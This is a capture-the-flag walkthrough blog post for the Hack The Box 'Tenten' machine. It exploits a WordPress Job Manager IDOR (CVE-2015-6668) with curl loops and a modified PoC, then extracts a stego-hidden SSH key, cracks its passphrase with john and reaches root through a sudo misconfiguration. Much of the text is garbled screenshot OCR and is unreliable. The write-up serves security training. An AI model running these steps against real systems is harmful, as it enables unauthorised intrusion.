HTB – Tenten Walkthrough

nmap

Not shown: 998 filtered ports 
PORT STATE SERVICE VERSION 
22/tcp open ssh 
OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; 
I ssh-hostkey: 
2048 (RSA) 
256 (ECDSA) 
256 (ED25519) 
80/tcp open http 
Apache httpd 2.4. 18 ( (Ubuntu)) 
I http-generator: WordPress 4.7.3 
I http-methods: 
Supported methods: GET HEAD POST OPTIONS 
I http-server-header: Apache/ 2.4. 18 (Ubuntu) 
I http-title: Job Portal – Just another WordPress site 
Service Info: OS: Linux; CPE: kernel 
protocol 2.0)

WPScan – enumerate users

wpscan 
--url http://10.10.10.10 
-log 
--enumerate u 
NOTE: Gem.gunzip is deprecated; use Gem: : Util.gunzip instead. It will be removed on or after 2018-12-01. 
Gem. 
gunzip called from /usr/lib/ruby/vendor ruby/ unicode/display width/ index. rb:5. 
The supplied log file / root/ .wpscan/log.txt already exists. If you continue the new output will be appended. 
Do you want to continue? [Y les [N]o, default: [N] 
WordPress Security Scanner by the WPScan Team 
Version 2.9.4 
Sponsored by Sucuri 
https://sucuri.net 
@ WPScan , @ethicalhack3r, @erwan I r, @ FireFart 
It seems like you have not updated the database for some time 
Last database update: 2019-03-18 
Do you want to update now? [Y les [NIO [A] bort update, default: 
Updating the Database . 
Update completed 
URL: http://10.10.10.10/ 
Started: Sat Jul 6 2019 
Interesting header: LINK: <http://10. 10. 10. 10/ index.php/wp-json/>; 
Interesting header: SERVER: Apache/ 2.4. 18 (Ubuntu) 
XML-RPC Interface available under: http://10.10.10. 10/xmlrpc.php 
Found an RSS Feed: http://10.10.10. 10/ index.php/feed/ 
[HTTP 200] 
Detected 1 user from RSS feed: 
I Name I 
I takis I 
rel="https : // api . w. org/" 
[HTTP 405]

WPScan – Plugin Vulnerability (IDOR) found

[+] Enumerating plugins 
| 1 plugin found: 
from passive detection . 
v7.2.5 
Name: job-manager - 
Latest version: O. 7.25 (up to date) 
Last updated: 
Location: http://10. 10. 10. 10/wp-content/plugins/job-manager/ 
Readme: http://10. 10. 10. 10/wp-content/plugins/job-manager/readme. txt 
Title: Job manager <= O. 7.25 
Insecure Direct Object Reference 
Reference: https://wpvulndb.com/vulnerabilities/8167 
Reference: https://vagmour.eu/cve-2015-6668-cv-filename-disclosure-on-job-manager-wordpress-plugin/ 
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6668 
Enumerating usernames . 
We identified the following 1 user: 
I ID I Login I Name 
Il 
I takis I takis 
Job I

https://vagmour.eu/cve-2015-6668-cv-filename-disclosure-on-job-manager-wordpress-plugin/

As the PoC explained in the above URL, I tried to upload CV files first

Request 
Raw Para ms 
Can tent 
Can tent 
Can tent 
Can tent 
Headers 
Hex 
Response 
Raw Headers 
ETT?/I.1 200 0K 
Hex 
HTML 
(Ubuntu} 
Re nder 
farm-data; iab:nan -field-Il" 
farm-data; iab:nan -field- It" 
farm-data; iab:nan -field-15" 
Sat, 06 Jul 201g 
Server: Apache/ 2 . Z. 18 
Vary: Accept -Encoding 
Content -Length: 
Cannectian: c lase 
field-16" 
filename=" 
$7 WOE 
Can tent - iType: text/ html; charset=L1iT? •8 
html > 
Cht:nl lang=" en •US" na 
Chead;• 
-width, 
Clink href="http: //g.mpg . arg/xfn/ll";• 
•:script;• (function (html} Chtm1.c1assName = 
initial-scale=l 
farm-data; iab:nan - 
Can tent - 'Type i:nage/png 
tb . png 
td$ 
html . className . replace ( /\bno -js\b/, • j s • (document . documentE1ement} ; 
Application Job 
< / script* 
z 
g 
c 
Iy 
z 
1 
kw 
w 
3 
c 
dwxS 
5. 
h 
6 
1 
z 
/ nyt} : A 
cYhJ7a a 
Eh ya 
6 y El # 
c 
3 
8 
6 
1 
shh 
dns •prefetch' href=' / / fan t s. gaagleapis. cam' 
dns•prefetch' href=' // s. w. arg' /;• 
httpg: // fants.gstatic. cam' crassarigin rel='precannect' 
alternate" type=" title=" 
href="http: // 10. 10. 10. 10/ index. php/feed/" /;• 
alternate" type=" title=" 
Clink 
Clink 
Clink 
Clink 
Clink 
rel=' 
rel=' 
href= ' 
re 
re 
JOE Part al 
JOE Part al 
•ragua ; 
•ragua ; 
Feed" 
Feed" 
OKU + 
z 
g 
a 
r 
k 
gEJ 
17 
3 
5 
6 
f CeGW E 
x 
g 
h 
Cib 
G 
Per e- 
7 
g 
7 
\ 1 zOM 
ytE1 .:SW 
00. 
href="http: // 10. 10. 10. 10/ index. /;• 
•:script type=" text/iavascript";• 
window._wpemoj i Settings = 
C "baseUr1" "https. \ / \ / s . w. i 1/2 . 2 . , "ext" . png" , svgUr1" "https 
\ / \ / s . w. i 1/2 . 2. , svgExt" . svg" , source" C "concatemoj i" "http 
10 . 10 . 10\/wp - includes\/j s \ / wp -emoj i -release . min. j 7 . 3" ; 
function (a, b, c} [function d (a} [var 
b , c , d, e , f=String. fromCharCode ; if kl I k. fill Text} return! 1 ; switch (k. clearRect O , O , j . width, j . heig 
ht} , k. , k. 32px Arial" , a} [case" flag" • return 
k. fillText (f (55356, 56826, 55356, 56819} , O, , . toDataURL U . length<3e3} (k. (0, o, j . widt 
h,) . height} , k. fillText (f (55356, 57331, 65039, 8205, 55356, 57096} , O, , . toDataURL , k. 
, o, j . width, j . height} , k. fillText (f (55356, 57331, 55356, 57096} , O, , . toDataURLU , h 
; case "emo 
j i4" I return 
k. fillText (f (55357, 56425, 55356, 57341, 8205, 55357, 56507} , O, . toDataURLU , k. clearRect o, j . w 
idth,j . height} , k. fillText (f (55357, 56425, 55356, 57341, 55357, 56507} , O, , . toDataURL 
urn! 1} function e [var 
c=b . createE1ement script" ; c . src=a , c . defer=c . type=" text/ javascript" , b . getE1ementsByTagName ( "he 
etl 
otJl 
Done 
1 
ib 
K 
k 
Glh 
1 
ad"} [01 . appendChi1d (c} y var 
=b createE1ement ("canvas"} 
Type a search 
term 
O matches 
Type a search 
, . . getContext ; for i=Array flag" , "emoj 
term 
54.877 bytes 
O matches 
1.881 mills

Since wp saves the uploaded files as /wp-content/uplaods/{year}/{month}/{file name}

I checked if the I uploaded exist, and yes it’s uploaded

10.10.10.10 
/wp-content/uploads/2019/07/htb.png

Also in HTML code of application page, I observed that the uploaded application name appears 

I brute forced the pages (idor vulnerability) and interesting application name appeared

curl -s http://10.10.10. 10/ index.php/jobs/apply/8/ I grep 
<title>Job Application: Pen Tester – Job 
for i in $(seq 1 20); do echo -n 
, curl -s http://10.10.10. 10/ index.php/jobs/apply/$i/ I 
grep 
done 
1: 
2: 
3: 
4: 
5: 
6: 
7: 
8: 
9: 
11: 
12: 
13: 
14: 
15: 
16: 
17: 
18: 
19: 
20: 
<title>Job 
<title>Job 
<title>Job 
<title>Job 
<title>Job 
<title>Job 
<title>Job 
<title>Job 
<title>Job 
<title>Job 
<title>Job 
<title>Job 
<title>Job 
<title>Job 
<title>Job 
<title>Job 
<title>Job 
<title>Job 
<title>Job 
<title>Job 
Application : 
Hello world! – Job Portal</title> 
Application : 
Sample Page – Job 
Application : 
Auto Draft – Job 
Application 
– Job 
Application : 
Jobs Listing – Job Portal</title> 
Application : 
Job Application – Job 
Application : 
Register – Job Portal</title> 
Application : 
Pen Tester – Job 
Application : 
– Job Portal</title> 
Application : 
Application – Job 
Application : 
cube – Job 
Application : 
Application – Job 
Application : 
HackerAccessGranted 
Application : 
Application – Job 
Application : 
htb – Job Portal</title> 
Application : 
Application – Job 
Application : 
htb – Job Portal</title> 
Application 
– Job 
Application 
– Job 
Application 
– Job 
root@kati : /home/kaIisa/HTB/tenten#

One can also do the brute force via Burp Intruder

Attack Save Columns 
Results Target Positions 
Filter: Showing all Items 
Payload 
Request 
Payloads 
Render 
Options 
Status 
200 
200 
200 
200 
200 
200 
200 
200 
200 
200 
200 
200 
200 
200 
200 
200 
200 
Error 
initial 
Timeout 
1 
2 
3 
4 
5 
6 
7 
8 
9 
10 
11 
12 
13 
14 
15 
16 
1 
2 
3 
4 
5 
6 
7 
8 
9 
10 
11 
12 
13 
14 
15 
16 
Length 
57855 
57857 
57854 
57839 
57748 
57850 
57865 
57847 
57855 
57810 
57860 
57844 
57862 
57906 
57748 
57748 
57748 
Request Response 
Raw Headers Hex 
ETT?/I.1 200 0K 
Sat, 06 Jul 201g 
Server: Apache/ 2 . a. 18 (Ubuntu} 
Vary: Accept •Encoding 
Content-Length: 57713 
Cannectian: c lase 
Can tent - iType: text/ html; charset=L1iT? •8 
Cht:nl lang=" en •US" class—Una-is na•svg";• 
Chead;• 
-width, 
Clink href="http: //gmpg.arg/xfn/ll";• 
•:script;• (function (html} Chtm1.c1assName = html. className.rep1ace 
Comment 
(document . documentE1ement} ; 
c/ script* 
Clink 
Clink 
Clink 
Clink 
Clink 
rel=' 
rel=' 
href= ' 
re 
re 
Application. HackerAccessGrantedl Job 
Portal" title* 
dns •prefetch' href=' / / fan t s. gaagleapis. cam' 
dns•prefetch' href=' // s. w. arg' /;• 
httpg: // fants.gstatic. cam' crassarigin rel='precannect' 
alternate" type=" application/ rss+x.ml" title=" 
alternate" title=" 
Jab Part al 
JOE Part al 
•ragua ; 
•ragua ; 
cc ript 
C"baseUr1" "https, 
type=" text/ iavascript";• 
window._wpemoj i Settings = 
w. \ /emoj i \ / 2 . 2 . 
11/721721/" , "ext" 
Peed" href="http: // 10. 10. 10. 10/ index. php/feed/" /;• 
Peed" href="http: // 10. 10. 10. 10/ index. /;• 
. png" , svgUr1" "https. \ / \ / s . w. i \ / 2 . 2. , svgExt" . svg" , source" C "concatemoj i" "http 
10

I used the PoC exploit in the blogpost above and modified the exploit a bit as below:

import requests 
print 
CVE-2015-6668 
Title: CV filename disclosure on Job-manager WP Plugin 
Author: Evangelos mourikis 
Blog: https://vagmour.eu 
Plugin URL: http://www.wp-jobmanager.com 
Versions: 
«=0.7 .25 
= raw input( 'Enter a vulnerable website. 
website 
= raw input( 'Enter a file name. 
filename 
filename2 
= filename. replace( 
for year in 
for i in 
, 'gif' , 'pngl}: 
for extension in {'doc' , 'pdf' , 'docx' , ' 
jpg' , ' jpeg' 
URL = website + "/wp-content/uploads/" 
+ str(year) + + 
. format (i) + 
+ filename2 + 
• + extension 
req = requests. get (URL) 
if req. status 
print [+] URL of CV found! 
+ URL

And found a file with the name HackerAccessGranted

python cve-2015-6668.py 
CVE-2015-6668 
Title: CV filename disclosure on Job-manager WP Plugin 
Author: Evangelos mourikis 
Blog: https://vagmour.eu 
Plugin URL: http://www.wp-jobmanager.com 
Versions: 
Enter a vulnerable website: http://10.10.10.10 
Enter a file name: HackerAccessGranted 
[+] URL of CV found! http://10. 10. 10/wp-content/uploads/2017/04/HackerAccessGranted.jpg

I downloaded the jpg file and checked for any info hidden in it using the following tools

strings HackerAccessGranted.jpg | less

exiftool HackerAccessGranted.jpg

binwalk HackerAccessGranted.jpg

steghide –extract -sf HackerAccessGranted.jpg (-sf for source file option)

extracting options: 
s f, --stegofile 
-sf <filename> 
p, - -passphrase 
-p <passphrase> 
xf, --extractfile 
-xf <filename> 
f, -- force 
q, --quiet 
v, --verbose 
select stego file 
extract data from 
specify passphrase 
use <passphrase> to extract data 
select file name for extracted data 
write the extracted data to <filename> 
overwrite existing files 
suppress information messages 
display detailed information 
options for the info command: 
p, - -passphrase 
-p <passphrase> 
specify passphrase 
use <passphrase> to get info about embedded data 
To embed emb.txt in cvr.jpg: steghide embed -cf cvr.jpg -ef emb.txt 
To extract embedded data from stg. jpg: steghide extract -sf stg. jpg 
steghide 
--extract -sf HackerAccessGranted.jpg 
Enter passphrase: 
wrote extracted data to "id rsa" .

Look the content of id_rsa file

-BEGIN RSA PRIVATE KEY----- 
Proc-Type: 4,ENCRYPTED 
DE-K-lnfo: AES-128-C8C, 7265FC656C429769E4CIEEFC618E660C 
/HXcU80T3Jhzb1H7uF9Vh7faa76XH1dr/ChOpDnJunjdmLS/1aq1ku1Q3/RF/Vax 
tj Tzj /V5h8EcL5GcHv3es romsoj rkpawfbvwbR+XxFIJuz7zLfd/vDo 
1KuGrCrRRsipkyae5Kiq1C137bmWK9aE/4c5X2yfVTOEeODdWOrAoTzGufWtThZf 
K2nyOiTGPndD7LMdm/0505As+ChDYFNphVIXDgfDzHgonKMC4iES7Jk8Gz20PJsm 
SdWCazF6p1Eqh14NQrnkd8kmKqzkpfWqZDz3æg6f49GYf97aM5TQgTday20FqoXH 
WPhK3CmOtMGqLZA01æoNuwXSOH53t9FG7GqU31wj7nAGW8pfGodGwedYde4z108P 
VbNu1RMKOkErv/NCiGVRcK6k5Qtdbwforh+6bmjmKE6QvMXbesZtQOgC9SJZ31MT 
JOIY838HQZgOsSw1jDrxuPV2DUIYFROW3kQrDVUym080xOwOf/MITxvrC2wvbHqw 
AAniuEotb90az/Pfau300/DVzYkq199VDX/Y81xd168qqZbXsM9s/aMCdVg7TJ1g 
2gxE1pV7U9kxi1/RNdx5UASFpvFs1mOn7CTZ6N44xiatQUHyVINgpNCyjfEmzxmo 
6FtWaVqbGStax1iMRC198ZOcRkX2VoTvT1hQw74rSPGPMEH+OSFksXp7Se/wCDMA 
pYZASVx160NWQGpAj5z4Wha8S8Er8ZVmFfykuh4107Tsnxa9WNoWX06XOFSOPMk 
tNp8bPPq15+M+dSZaObad9E/mnv8faSKlvkn4epk87nOVk01ssLcecfxi+bWnGPm 
KowyqU6iuF28w1J98towgnWrUgt1qubmkOwkf+108ig7komyT9KfZegR70F92xE9 
41WDTxfLy7501DHORrmOf77D4HvNC2qQOdYHkApd1dk4b1cb71Fi5WF183RruygF 
2GSre8yXn5g915Ya82uC30+ST5Q8eY2pT88k2D61kmt6u11LnoOSkr3v9r6JT5J7 
LOUtmgdUqf+35æcA70L/w11POE04UOaaGpscDg059DL88dzv1hyHg4T1fd9xWtQS 
VxmzURTwEZ43j SxX94PL lwcxzLV6FfRVAKdbi6kACsgVeULi1+YAfPj 11yVOm1kv 
5HV/bYJvVatGtmkNumtuK7NOH8iE7kCDxCnPnPZaOnWoHDk4yd50R1zznkPna74r 
Xb09FdNeLNmER/7GGdQARkpd52Uur08f1JW2wyS1bdgb8gw/G+puFAR8z7ipgj4W 
p9LoYqiuxaEbiD5zUzeOtKAKL/nfmzK82zbdPxmrv7TvHUSSWEUC409QKi83amgf 
ywmjw30tH+ZLn8my/fS61VQ50nV6rVhQ7+LRKeæq1Yidzfp1911L8Uidbs8fWAz8 
9XkOsH5c1NQT6spo/nQM3UN1kknæa7zKPJmetHs040b3xKLiSpw5f35SRV4rF+mO 
v1UE1/YssXM07TK6i81XCuuOUtOpGiLxNVR1aJvbGmazLWCSyptk5fJhPLkhuK+J 
YoZn9FNAuRiYFL3rw+6q01+KoqzoPJJek6WHRy80SE+8Dz1ysTLIP86tGKn7EWnP 
END RSA PRIVATE KEY----- 
id r sa (END)

Since it’s encrypted, we need to decrypt it first to use it

Turn the file into john crackable form with sshng2john tool

python sshng2john.py id rsa > id john 
cat id john 
16 
id rsa:$sshng$1$16$7265FC656C429769E4CIEEFC618E660C$1200$fc75dc501393dc98736e51fbb85f5587b7da6bbe971c876bfc2874a439c9ba78dd98b4bf95aab592e950dff445fd56b1b634f 
38ff5798411 
8eOdd5b4acOa 13cc6b9f5ad4e 165f2b69f2d224c63e7743ecb3 
9262aace4a5f5aa643cf7faoe9fe3d1987fdeda3394d081375acb6a05aa85c758f84adc29b4b4c1aa2d9034d7ea0dbb05d2d07e77b7d146ec6a94df5c23ee7006581a5f1a8746c1e75875ee3394e04 
16de442bOd55329 
b4068c4ecOe7ff3254f1bebOb6c2f6c7ab00009e2b84a2d6fda1acff3df6aedce3bfOd5cd892a23df550d7fd8048c5dd7af2aa996d7bOcf6cfda30275583b4c9d60daOc4496957b53d9318a5fd135d 
c79500485a6f16c9663a7ec24d9e8de38c626ad4141f2575360a4dOb28df10ccd7328e85b56695a9b192b5ac7588c442d7df19d1c4645f65684ef4e5850c3be2b48f18f3041fe392164b17a7b49eff 
0083300a58640495c65ea835640afa9023e73e1685a052044afc6559857f292e878968ed3b27c5af56368597a3a5f415238f324b4da416cf3ead79f8cf9d49968e6da77d13f327bc17da48a96f927e 
lea6407b9f45643b5b2c2dc79c7f lee817ddb 113de085834f 17cbcbbe68d43 
1292bde 
ff6be894f927b2f452d320754a9ffb7e7e700ef42ffc0894fd04d3853469a1a9b1cOeOd39f432fcf1dcef221c878384e57ddf715ad4125713335114f0119e378d2c57f783cb970731ccb57a15f4550 
Oa75b8ba9000ac8157942e223ec807cf8c82325749b592fe4757f6d826f55ab46b6690db8cb6e2bb34e1fc884ee4083c429cf9cf65ad275a81c3938c9de74465cf39e43e76bbe2b5dba3d15d35e2cd 
98447fec619d400464a5de7652eaf4f 11b883e7353378eb4aOOa2ff9df9b32bcdb36dd3f 132bbfb4ef Id449258450 
1355448689bdb la66b32d6092ca9b64e5f2613cb921b8af89628667f45 
340b9189814bdebc3eeaaa25f8aa2ace83c925e93a587472foe484fbc0f3d72b132c83c1ead18a9fb1169cf 
root@kati : /home/kaIisa/HTB/tenten#

Then crack the passphrase

john id john --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8 
Loaded 1 password hash (SSI-I [RSA/DSA/EC/OPENSSH (SSI-I private keys) 32/32]) 
Cost 1 (KDF/cipher [O=MD5/AES 1=MD5/3DES 2=8crypt/AES]) is O for all loaded hashes 
Cost 2 (iteration count) is 1 for all loaded hashes 
Will run 4 Openmp threads 
Note: This format may emit false positives, so it will keep trying even after 
finding a possible candidate. 
Press 'q' or Ctrl-C to abort, almost any other key for status 
superpassword 
(id rsa)

Change the permission of rsa file to 600 and login to takis user with the passphrase cracked

chmod 600 
id rsa 
ssh -i id 
r sa takis@10.10.10.10 
Enter passphrase for key 'id rsa' : 
Welcome to Ubuntu 16.04.2 L TS (GNU/ Linux 4.4.0-62-generic x86 64) 
* Documentation: 
* management: 
* Support: 
https://help . ubuntu . com 
https // landscape . canonical . com 
https : //ubuntu . com/advantage 
65 packages can be updated. 
39 updates are security updates. 
Last login: Fri may 5 2017 
takis@tenten : —$

Priv Esc

takis@tenten:—$ sudo -l 
matching Defaults entries for takis on tenten: 
env reset, mail badpass, secure 
User takis may run the following commands on tenten: 
(ALL : ALL) ALL 
(ALL) NOPASSWD: /bin/fuckin

So takis user can run /bin/fuckin as root 

The content of the file can be seen below, it gets arguments and executes them

/ bin/ bash 
/bin/fuckin (END)

We use sudo /bin/fuckin bash and become root

takis@tenten:—$ cat /bin/fuckin 
/ bin/ bash 
takis@tenten:—$ sudo /bin/fuckin bash 
whoami 
root 
root@tenten :

Leave a comment

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.